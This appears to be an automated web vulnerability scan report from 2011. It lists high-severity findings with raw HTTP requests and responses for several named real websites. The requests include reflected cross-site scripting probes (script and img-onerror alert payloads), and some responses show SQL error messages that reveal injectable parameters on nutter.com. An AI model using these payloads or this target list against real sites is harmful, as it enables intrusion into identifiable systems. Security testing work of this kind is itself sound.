HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:42:55 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: Language=7483b893-e478 Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46467 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /dallas-united-states-of |
GET /dallas-united-states-of Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:42:33 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: Language=7483b893-e478 Set-Cookie: NavId=1853; path=/ Set-Cookie: PortletId=5990402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42545 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /disclaimer/uniGC.aspx |
GET /disclaimer/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 02:13:00 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1855; path=/ Set-Cookie: PortletId=5992402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 50878 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /news/uniGC.aspx |
GET /news/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Language=7483b893-e478 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:42:02 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1849; path=/ Set-Cookie: PortletId=5986402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Set-Cookie: sessionKey=3274fdb8-62f1 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 170885 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /news/uniGC.aspx |
GET /news/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:44:09 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1849; path=/ Set-Cookie: PortletId=5986402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171008 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... </script>d2516<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /private_wealth_advisors/ |
GET /private_wealth_advisors/ Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:40:34 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: Language=7483b893-e478 Set-Cookie: NavId=1847; path=/ Set-Cookie: PortletId=5984402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45737 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:42:58 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:38:42 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172423 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /services/uniGC.aspx |
GET /services/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Language=7483b893-e478 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:42:59 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1847; path=/ Set-Cookie: PortletId=5984402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Set-Cookie: sessionKey=0f5e93eb-bc1c Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 79952 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hunton.com |
Path: | /sitemap/uniGC.aspx |
GET /sitemap/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 23:45:17 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1856; path=/ Set-Cookie: PortletId=5993402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43948 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <div id="PDFBuilderUrl">http:/ ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /financing/images |
GET /financing9b81e"><a>049843051a/images/powerline_bg.png HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 29471 Date: Fri, 06 May 2011 19:12:49 GMT X-Varnish: 1128245960 Age: 0 Connection: keep-alive Via: 1.1 varnish 172.17.2.234 X-Cache: MISS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <ul id="navonfinancing9b81e"><a>049843051a"> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /financing/index.php |
GET /financingf484e"><a>625578a4d6c/index.php HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:16:25 GMT Connection: Keep-Alive Set-Cookie: X-Mapping-chcfmbmj Content-Length: 29472 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <ul id="navonfinancingf484e"><a>625578a4d6c"> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-bootm-bg |
GET /images816ba"><a>15c94e97594/footer-bootm-bg.jpg?9 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:17:50 GMT Connection: Keep-Alive Content-Length: 29469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <ul id="navonimages816ba"><a>15c94e97594"> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/footer-top-bg.jpg |
GET /imagesb074f"><a>71be161f337/footer-top-bg.jpg?2 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:17:53 GMT Connection: Keep-Alive Content-Length: 29469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <ul id="navonimagesb074f"><a>71be161f337"> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.millerwelds |
Path: | /images/header-background |
GET /images3b61d"><a>e7d8c4ea814/header-background.jpg?3 HTTP/1.1 Host: www.millerwelds.com Proxy-Connection: keep-alive Referer: http://www.millerwelds User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=94003201 |
HTTP/1.1 404 Not Found Server: Apache/2.2 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 19:18:18 GMT Connection: Keep-Alive Content-Length: 29469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <ul id="navonimages3b61d"><a>e7d8c4ea814"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nextadvisor |
Path: | /favicon.ico |
GET /favicon.ico7929e"><script>alert(1)< Host: www.nextadvisor.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252293142 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 21:42:25 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21 X-Powered-By: PHP/5.3.2 Set-Cookie: PHPSESSID=4828c90862 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Vary: Accept-Encoding Content-Type: text/html Content-Length: 11910 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nextadvisor |
Path: | /includes/javascript.php |
GET /includes268aa"><script>alert(1)< Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252293142 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 21:43:38 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21 X-Powered-By: PHP/5.3.2 Set-Cookie: PHPSESSID=6286bcccdf Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Vary: Accept-Encoding Content-Type: text/html Content-Length: 11905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nextadvisor |
Path: | /includes/javascript.php |
GET /includes61954'><img%20src%3da Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252293142 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 21:43:49 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21 X-Powered-By: PHP/5.3.2 Set-Cookie: PHPSESSID=dd8b8adc8c Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Vary: Accept-Encoding Content-Type: text/html Content-Length: 11944 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <a href='/includes61954'><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nextadvisor |
Path: | /includes/javascript.php |
GET /includes/javascript.phpc1ba3"><script>alert(1)< Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252293142 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 21:44:28 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21 X-Powered-By: PHP/5.3.2 Set-Cookie: PHPSESSID=6be516bd9c Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Vary: Accept-Encoding Content-Type: text/html Content-Length: 11925 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /attorneys.php |
GET /attorneys.php?AttorneyID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:15:25 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 9247 error: Unknown column '59da30a' in 'where clause' | 1054<BR>sql: SELECT FirstName,LastName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nutter.com |
Path: | /careers.php |
GET /careers.php?CategoryID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:19:42 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 8570 <!-- careers start --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ' AND M.MediaTitle LIKE 'header%' AND M.MediaID=R1.FieldValue AND R1.TableName='_media' AND R1.KeyID=R2.KeyID AND R2.TableName='careers' AND R2.FieldValue=X.CareerID AND X.IsActive='y' AND X.CareerID=429f2f<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.nutter.com |
Path: | /careers.php |
GET /careers.php?CategoryID Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:17:54 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 17264 <!-- careers start --> error: Unknown column '224c89d' in 'where clause' | 1054<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=224c89d<a>50084c84a3a <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | /button/ |
